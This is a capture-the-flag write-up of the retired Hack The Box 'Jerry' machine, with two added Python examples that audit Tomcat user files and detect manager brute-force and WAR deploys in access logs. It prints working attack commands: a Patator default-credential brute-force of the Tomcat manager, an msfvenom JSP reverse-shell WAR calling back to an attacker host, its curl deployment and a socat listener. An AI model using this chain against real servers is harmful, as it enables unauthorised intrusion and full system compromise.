Hack The Box Jerry Writeup

Published: September 9, 2024, updated: January 16, 2025

This is a writeup for the retired Hack The Box Jerry machine.

Solution summary

Solution

We run through the following steps to retrieve the flags:

  1. Find out frequently used default passwords for Tomcat instances.
  2. Craft a reverse shell payload using Metasploit’s msfvenom.
  3. Upload the reverse shell payload using Tomcat’s deploy mechanism and launch the reverse shell.
  4. Read out the flags from the Administrator’s desktop.

Nmap

Did you know that on Linux, distributions commonly configure ping to be a setuid binary? Ping needs to send out raw (non-TCP) packets, and handling raw sockets requires the CAP_NET_RAW capability on Linux.

For example, you can find the specific code that configures ping to be a setuid binary in NixOS right here.

# Nmap seems to be a bit stubborn without sudo: run unprivileged, it appears to
# think the host is down, since the host blocks its ping probes
sudo nmap -sV -sC -A -oX machines/jerry/nmap.xml \
  10.10.10.95
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:38 JST
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   291.39 ms 10.10.16.1
2   291.38 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds

To be sure we don’t miss any TCP ports, we run a second TCP-only scan:

sudo nmap -p- -sT -oX machines/jerry/nmap_tcp.xml 10.10.10.95

We don’t find any other open ports after running an exhaustive scan:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:44 JST
Nmap scan report for 10.10.10.95
Host is up (0.084s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Findings:

Apache Tomcat

Landing page of Jerry’s Apache Tomcat


The ASF released Apache Tomcat version 7.0.88 in 2018. This version has many known vulnerabilities.

Three vulnerabilities look interesting because they’re low-complexity and can lead to an RCE.

It turns out that we can get in through a much easier weakness, as we’re going to see later.

We try to identify interesting paths within the address http://10.10.10.95:8080 using the tool feroxbuster:

feroxbuster --wordlist SecLists/Discovery/Web-Content/common.txt \
  --threads 10 --scan-limit 1 \
  --url http://10.10.10.95:8080 --silent | tee machines/jerry/feroxbuster.log

The following address sticks out:

http://10.10.10.95:8080/manager/html

Cracking the management panel password

Why don’t we brute-force our way into the management panel located at /manager/html? Here’s what we see when we try to access it without any authentication:

curl http://10.10.10.95:8080/manager/html -I

We get a 401 status code, and the WWW-Authenticate header tells us that Basic authentication is required:

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 02:00:00 EET
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Mon, 09 Sep 2024 09:15:37 GMT

We try to fuzz the password using Patator.

patator.py http_fuzz \
  url=http://10.10.10.95:8080/manager/html \
  method=GET \
  0=SecLists/Usernames/cirt-default-usernames.txt \
  1=SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt \
  user_pass=FILE0:FILE1 \
  -x ignore:code=401

admin:admin does the trick and we manage to log in. tomcat:s3cret also seems to work.

Logged in management screen

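The two hits above (admin:admin and tomcat:s3cret) are exactly the kind of account a defender should catch before anyone runs Patator. Below is an added example, not code from the original writeup, that audits a Tomcat conf/tomcat-users.xml for default credentials and short passwords on accounts holding manager or admin roles; the sample file, the credential list and the role list are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml in the layout Tomcat ships under conf/;
# the accounts are made up for this example (the page's two hits are included).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="admin" password="admin" roles="manager-gui"/>
  <user username="deploy" password="Xq9!vL2#pR8zT" roles="manager-script"/>
  <user username="reader" password="tomcat" roles="probe"/>
</tomcat-users>
"""
# Pairs that appear in common default-credential wordlists; extend from your own list.
DEFAULT_CREDS = {("admin", "admin"), ("tomcat", "s3cret"), ("tomcat", "tomcat"),
                 ("admin", "tomcat"), ("admin", "password"), ("manager", "manager")}
# Roles that grant access to the manager / host-manager web applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}

def local_name(tag):
    """Strip an XML namespace ({uri}user -> user); files may or may not declare one."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text, min_length=12):
    """Return {username: finding} for accounts a reviewer should act on."""
    findings = {}
    for el in ET.fromstring(xml_text).iter():
        if local_name(el.tag) != "user":
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = bool(roles & PRIVILEGED_ROLES)
        if (name, pw) in DEFAULT_CREDS:
            findings[name] = ("default credentials" +
                              (" on a manager role" if privileged else ""))
        elif privileged and len(pw) < min_length:
            findings[name] = "short password on a manager role"
    return findings
```

Passwords stored as digests (when a CredentialHandler is configured) will not match the plaintext pairs, so for those files the length check alone applies.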

Uploading a reverse shell

From /docs/manager-howto.html:

http://localhost:8080/manager/text/deploy?path=/foo

Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.

We craft a shell using msfvenom:

msfvenom --payload java/jsp_shell_reverse_tcp \
  --platform windows --arch x86 \
  LHOST=10.10.16.6 \
  LPORT=4444 \
  -f war > machines/jerry/msfvenom_shell.war

Then, we use curl to upload the msfvenom_shell.war file created by msfvenom.

curl -u "tomcat:s3cret" "http://10.10.10.95:8080/manager/text/deploy?path=/shell" \
  --upload-file machines/jerry/msfvenom_shell.war

The upload works:

OK - Deployed application at context path /shell
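Every step of this chain leaves a trace in Tomcat's access log: a run of 401s against /manager/html, a 200 on the same path once a password hits, and a PUT to /manager/text/deploy. The following added example (not part of the original writeup) runs that detection logic over constructed access-log lines in Tomcat's default "common" pattern; the threshold, window and sample lines are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Tomcat access-log lines in the default "common" pattern
# (%h %l %u %t "%r" %s %b), modelled on this writeup's requests; not real logs.
SAMPLE_ACCESS_LOG = """\
10.10.16.6 - - [09/Sep/2024:18:15:30 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - - [09/Sep/2024:18:15:31 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - - [09/Sep/2024:18:15:32 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - tomcat [09/Sep/2024:18:15:40 +0900] "GET /manager/html HTTP/1.1" 200 15309
10.10.16.6 - tomcat [09/Sep/2024:18:16:02 +0900] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 52
10.10.16.6 - - [09/Sep/2024:18:16:10 +0900] "GET /shell/ HTTP/1.1" 200 -
10.10.14.2 - - [09/Sep/2024:18:16:15 +0900] "GET / HTTP/1.1" 200 11418
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e

def detect(lines, burst_threshold=3, window_seconds=60):
    """Alerts for a 401 burst on /manager, a login after it, and a WAR deploy."""
    alerts, flagged = [], set()
    failures = defaultdict(list)  # ip -> timestamps of recent 401s on /manager
    for e in filter(None, map(parse_line, lines)):
        ip, path, method = e["ip"], e["path"], e["method"]
        if path.startswith("/manager"):
            if e["status"] == 401:
                failures[ip] = [t for t in failures[ip] + [e["ts"]]
                                if (e["ts"] - t).total_seconds() <= window_seconds]
                if len(failures[ip]) >= burst_threshold and ip not in flagged:
                    flagged.add(ip)
                    alerts.append((ip, "manager brute-force: %d failures within %ds"
                                   % (len(failures[ip]), window_seconds)))
            elif e["status"] == 200 and ip in flagged:
                flagged.discard(ip)
                alerts.append((ip, "manager login succeeded after brute-force as %s" % e["user"]))
        # A WAR deploy is a PUT to the text interface or a POST to the HTML upload form.
        if (method == "PUT" and path.startswith("/manager/text/deploy")) or \
           (method == "POST" and path.startswith("/manager/html/upload")):
            alerts.append((ip, "WAR deployed via manager by %s: %s" % (e["user"], path)))
    return alerts
```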

We launch Socat locally:

socat -d TCP4-LISTEN:4444 STDIO
# Somewhere else
curl http://10.10.10.95:8080/shell/

Retrieve flags

The shell works and we become a privileged user:

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
nt authority\system

We find the flags on the Administrator’s desktop:

dir C:\Users\Administrator\Desktop\flags\
06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,397,736,960 bytes free

Print out the flags:

type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

We find the flags:

user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
